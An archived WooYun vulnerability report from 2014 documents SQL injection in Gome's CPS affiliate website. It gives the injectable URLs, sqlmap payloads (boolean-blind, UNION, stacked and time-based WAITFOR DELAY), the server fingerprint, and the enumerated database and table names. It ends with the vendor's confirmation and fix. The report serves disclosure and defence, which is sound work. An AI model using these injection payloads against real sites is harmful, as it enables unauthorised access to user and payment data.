乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-16: 细节已通知厂商并且等待厂商处理中 2014-02-24: 厂商已经确认,细节仅向厂商公开 2014-03-06: 细节向核心白帽子及相关领域专家公开 2014-03-16: 细节向普通白帽子公开 2014-03-26: 细节向实习白帽子公开 2014-04-02: 细节向公众公开
SQL注入
站点:http://cps.gome.com.cn/注入点:1.http://cps.gome.com.cn/Home/NoticeDetail?id=1322.http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E id=901站点的注入点修复不完全,只是跳转,关键的传递参数未做处理。
以第一个注入点为例:数据库:
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=132' AND 1148=1148 AND 'bVwH'='bVwH Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id=-1683' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(108)+CHAR(100)+CHAR(118)+CHAR(115)+CHAR(102)+CHAR(118)+CHAR(83)+CHAR(102)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(102)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=132'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=132' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008available databases [5]:[*] GomeCps[*] master[*] model[*] msdb[*] tempdb
GomeCps数据库的table:
Database: GomeCps[46 tables]+-------------------------+| Accounts || AdsCode || AdsCode || AdsUserSelf || BackupCookies || BannerAds || BaseCPSOriDataEffects || CPSNoEffectBanlce || CPSOriDataEffect_Backup || CPSOriDataEffect_Backup || CPSOriDataOccur_Backup || CPSOriDataOccur_Backup || CommissionByPcd || Commissions || CookiesRecent || Cookies_D || Cookies_D || CurrentSettlements || EarnerInfos || HelpSetUp || IpReport || IpReportRecent || MemberType || Notices || PageGroup || Payments || Products || RecommendedAd || RoleAuthority || Roles || SettlementHistorys || SettlementLogs || ShowComTop || SiteType || StageCommissionLogs || StageCommissionLogs || Taxs || TemporaryBackupCookies || Users || WebSites || categorysHistory || categorysHistory || modules || plan || sqlmapfile || sysdiagrams |+-------------------------+
对传递的参数进行处理
危害等级:低
漏洞Rank:5
确认时间:2014-02-24 15:18
已对漏洞进行修复,谢谢支持
暂无